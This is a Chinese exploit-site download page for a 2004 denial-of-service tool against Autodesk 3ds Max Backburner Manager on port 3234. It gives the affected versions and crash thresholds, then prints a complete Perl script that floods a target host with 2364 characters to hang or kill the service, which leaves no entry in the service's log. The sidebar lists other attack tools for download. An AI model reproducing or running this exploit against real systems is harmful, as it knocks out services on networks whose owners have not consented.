首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全工具>攻击程序>软件详细
软件名称:  3dmaxdos.exe
文件类型:  
界面语言:  简体中文
软件类型:  国产软件
运行环境:  WinNT/2K/Xp
授权方式:  共享软件
软件大小:  542K
软件等级:  ★★★★☆
发布时间:  2004-10-24
官方网址: http://www.Xtiger.net&www. 作者:X-tiger
演示网址:
软件说明:  
3Dmax backburner Manager Dos Exploit

漏洞发现:tiger
测试代码:tiger      
来    源:www.Xtiger.net&www.ThySea.com
发布日期:2004-10-20  

受影响版本:

3dmax 5.0 backburner Manager Version 2.0
3dmax 6.0 backburner Manager Version 2.2
3dmax 6.0 SP1 backburner Manager Version 2.2
--------------------------------------------------------------------------------

    3Dmax backburner Manager是AUTODESK公司出品的著名图形和动画设计软件3DMAX的网络组件,用于网络协作进行渲染等操作。此组件作为服务形式监听在3234端口,存在DOS攻击缺陷,发送超长字符会导致服务挂起.分为以GUI界面的manager.exe和注册为系统服务的managersvc.exe两种方式.

以下是存在的问题:

1、manager.exe

    连接服务端3234端口后,发送超过228个字符后会导致系统CPU使用率达到100%极大的耗用资源并无法进行正常服务,超过230个字符会使manager.exe停止服务(WRN General exception handled in TCP Thread),以上都会导致不能TCP连接。在发送达到2364的时候程序会直接退出!日志中没有记录任何信息(当然Socket连接还是记录了).

2、注册为系统服务的managersvc.exe

   连接服务端3234端口后,发送超过2364个字符会导致目标主机3Dmax backburner Manager服务挂起,程序直接退出,日志中也不会有任何的记录。

以下是测试代码:
############################################################
#!C:\perl\bin\perl.exe

use IO::Socket;

my $progname = $0;
$progname =~ s,.'*/,,;   
$progname =~ s/\.\w*$//;

$host = shift || 'localhost';     #目标主机地址
$port = shift || '3234';          #3Dmax backburner Manager默认监听在3234端口
$title = " =============================================\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\n =============================================\n  BY tiger---www.xtiger.net&www.thysea.com\n";
$Usage = "  Usage: $progname [Host] [port](default is 3234)\n";

if ($host > 0){  #判断输入数据
    dos();
}
else  {
    usage();
}

sub dos   #DOS攻击
{
my $socket = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
)                #建立socket连接
or print "$title  [*] ERR-->can't connect to $host:$port! :(\n" and exit;
print ($title, "[*] connected to $host:$port\n");
print "[*] Sending string...\n";
  
print $socket ("?"x(2364),"\r\n") or die "$title  [*] ERR-->Sending string failed! :(\n";#发送超长字符
print "[*] maybe crashed!\n";

$socket->close;#关闭socket连接
}

sub usage    #帮助信息
{
    die $title,$Usage;
}
#######################################################
    
    在3DMAX5的时候就有这个问题了,但到了3DMAX6,问题依然存在.看来AUTODESK公司并没注意到这个缺陷.
    不知道有没有Overflow,这就让某些牛人来做了.本人水平暂时就到这儿了。意见和建议可以到www.Xtiger.net,本人陋站和www.thysea.com反应和交流.谢谢!
下载地址: 进入下载地址列表
下载说明: ☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热门软件
·qwks.cpp(MS03-049)
·ms05039.rar
·fsie.rar
·Serv-U FTP溢出漏洞利用工具
·NBSI2破解版
·MS08-067.rar
·Churrasco.zip
·提权大杀器(2010黑帽大会公布的
·tfn2k.tgz
·SMBdie
·ms04-011.rar
·WinArpAttacker3.50.rar
  相关软件
·commOver11.rar
·NBSI2破解版
·(MS04-034)zip文件攻击工具
·phpbb的exp
·Phpbb_php.exe
·黑洞1023皮鲁专用版
·WINS(ms04045).zip
·raptor_xmas04.rar
·atk4.0src.zip
·trillian3.tar.gz
·forum-aztek.exe
·phpbbexp.rar
 
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved